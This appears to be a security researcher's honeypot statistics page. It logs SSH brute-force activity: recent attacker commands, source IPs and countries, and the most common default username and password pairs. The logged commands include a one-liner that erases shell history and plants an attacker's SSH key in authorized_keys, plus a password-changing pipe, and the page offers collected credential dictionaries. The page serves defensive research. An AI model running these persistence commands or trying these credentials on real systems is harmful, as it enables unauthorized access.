ENG ITA

# Ethical Hacker & ICT Security Specialist

Honey pot (Honeypot)

A honey pot is a computer system on the Internet that is expressly set up to attract and "trap" malicious traffic and people who attempt to penetrate other people's computer systems.

Essentially it's a software or hardware component used as decoy, in order to be able to study attacks in real time.

Look at my honeypot stats:

Live Dictionaries

You can download dictionaries of passwords, usernames and pass+users collected from SSH attacks:

General honeypot stats below:

SSH

×
Last 50 commands executed
DateCommandSource
2019-04-20 23:56:50uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd61.91.109.55 Thailand
2019-04-20 23:50:41uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd64.52.23.105 United States
2019-04-20 23:00:57lscpu | grep Model115.236.33.226 China
2019-04-20 23:00:51uname -a115.236.33.226 China
2019-04-20 23:00:46uname115.236.33.226 China
2019-04-20 23:00:40top115.236.33.226 China
2019-04-20 23:00:36cat /proc/cpuinfo | grep model | grep name | wc -l115.236.33.226 China
2019-04-20 23:00:30uname -m115.236.33.226 China
2019-04-20 23:00:25w115.236.33.226 China
2019-04-20 23:00:20crontab -l115.236.33.226 China
2019-04-20 23:00:15ls -lh $(which ls)115.236.33.226 China
2019-04-20 23:00:15which ls115.236.33.226 China
2019-04-20 23:00:11free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}115.236.33.226 China
2019-04-20 23:00:10free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'115.236.33.226 China
2019-04-20 23:00:05cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'115.236.33.226 China
2019-04-20 23:00:05cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}115.236.33.226 China
2019-04-20 23:00:00echo -e "gay\\naQWBQkFoXQFN\\naQWBQkFoXQFN"|passwd|bash115.236.33.226 China
2019-04-20 23:00:00Enter new UNIX password: 115.236.33.226 China
2019-04-20 22:59:55cat /proc/cpuinfo | grep name | wc -l115.236.33.226 China
2019-04-20 22:49:38uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;rm -rf .ssh/authorized_keys;touch .ssh/authorized_keys;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/authorized_keys;cd106.12.90.123 China
2019-04-20 22:40:01lscpu | grep Model213.108.216.27 Russian Federation
2019-04-20 22:39:56uname -a213.108.216.27 Russian Federation
2019-04-20 22:39:49lscpu | grep Model92.81.222.217 Romania
2019-04-20 22:39:44uname213.108.216.27 Russian Federation
2019-04-20 22:39:40uname -a92.81.222.217 Romania
2019-04-20 22:39:34top213.108.216.27 Russian Federation
2019-04-20 22:39:29uname92.81.222.217 Romania
2019-04-20 22:39:22cat /proc/cpuinfo | grep model | grep name | wc -l213.108.216.27 Russian Federation
2019-04-20 22:39:18top92.81.222.217 Romania
2019-04-20 22:39:12uname -m213.108.216.27 Russian Federation
2019-04-20 22:39:07cat /proc/cpuinfo | grep model | grep name | wc -l92.81.222.217 Romania
2019-04-20 22:39:01w213.108.216.27 Russian Federation
2019-04-20 22:38:56uname -m92.81.222.217 Romania
2019-04-20 22:38:51lscpu | grep Model178.128.162.10 Greece
2019-04-20 22:38:46crontab -l213.108.216.27 Russian Federation
2019-04-20 22:38:41w92.81.222.217 Romania
2019-04-20 22:38:36uname -a178.128.162.10 Greece
2019-04-20 22:38:32crontab -l92.81.222.217 Romania
2019-04-20 22:38:27ls -lh $(which ls)213.108.216.27 Russian Federation
2019-04-20 22:38:27which ls213.108.216.27 Russian Federation
2019-04-20 22:38:23uname178.128.162.10 Greece
2019-04-20 22:38:17ls -lh $(which ls)92.81.222.217 Romania
2019-04-20 22:38:17which ls92.81.222.217 Romania
2019-04-20 22:38:13top178.128.162.10 Greece
2019-04-20 22:38:09free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'213.108.216.27 Russian Federation
2019-04-20 22:38:09free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}213.108.216.27 Russian Federation
2019-04-20 22:38:02cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'213.108.216.27 Russian Federation
2019-04-20 22:38:02cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;}213.108.216.27 Russian Federation
2019-04-20 22:37:57free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'92.81.222.217 Romania
2019-04-20 22:37:57free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7}92.81.222.217 Romania
×
Last 20 sessions
DateSource
2019-04-21 00:00:065.188.86.211 Ireland
2019-04-21 00:00:065.188.87.51 Russian Federation
2019-04-21 00:00:05134.19.187.75 Netherlands
2019-04-21 00:00:0288.214.26.90
2019-04-21 00:00:005.188.86.206 Ireland
2019-04-20 23:59:585.188.86.165 Ireland
2019-04-20 23:59:54185.220.221.222 Czech Republic
2019-04-20 23:59:535.188.86.165 Ireland
2019-04-20 23:59:52107.170.172.23 United States
2019-04-20 23:59:45185.220.221.223 Czech Republic
2019-04-20 23:59:445.188.87.54 Russian Federation
2019-04-20 23:59:25185.220.221.224 Czech Republic
2019-04-20 23:59:21134.19.187.75 Netherlands
2019-04-20 23:59:18185.220.221.224 Czech Republic
2019-04-20 23:59:08134.19.187.78 Netherlands
2019-04-20 23:59:065.188.86.167 Ireland
2019-04-20 23:59:025.188.86.211 Ireland
2019-04-20 23:58:5488.214.26.88
2019-04-20 23:58:535.188.86.198 Ireland
2019-04-20 23:58:525.188.86.167 Ireland
×
TOP 15 USER+PASS
CountUsernamePassword
437715 adminadmin123
13785 rootchangeme
4242 admin
1729 adminaerohive
1294 ubntubnt
760 adminadmin
511 supportsupport
419 rootadmin
394 useruser
374 serviceservice
357 root!@
340 piraspberry
330 usuariousuario
304 111111admin
302 adm12345678
×
TOP 20 SUCCESSFUL LOGIN IPs
CountSource
218215.188.86.174 Ireland
202115.188.86.211 Ireland
130335.188.87.49 Russian Federation
1302888.214.26.88
127195.188.87.54 Russian Federation
126965.188.87.55 Russian Federation
1261188.214.26.89
1245588.214.26.94
12340185.220.221.223 Czech Republic
122795.188.87.53 Russian Federation
11856185.220.221.203 Czech Republic
114705.188.86.170 Ireland
111575.188.87.51 Russian Federation
107545.188.86.208 Ireland
107295.188.86.194 Ireland
1071688.214.26.90
106485.188.87.52 Russian Federation
10622185.220.221.222 Czech Republic
105845.188.86.169 Ireland
105205.188.86.195 Ireland
×
TOP 20 attackers
ConnectionsSource
226905.188.86.174 Ireland
210495.188.86.211 Ireland
1357988.214.26.88
1320188.214.26.89
131675.188.87.49 Russian Federation
1309388.214.26.94
130535.188.87.54 Russian Federation
130515.188.87.55 Russian Federation
13022185.220.221.223 Czech Republic
127995.188.87.53 Russian Federation
12344185.220.221.203 Czech Republic
119045.188.86.170 Ireland
113255.188.87.51 Russian Federation
113105.188.87.52 Russian Federation
112895.188.86.208 Ireland
111815.188.86.169 Ireland
111625.188.86.197 Ireland
1113788.214.26.90
111155.188.86.195 Ireland
11099185.220.221.222 Czech Republic

If you want to take a look to the source code of this page, go to my project HoneyStats! (github)

Want to know more? Check out my Security LAB!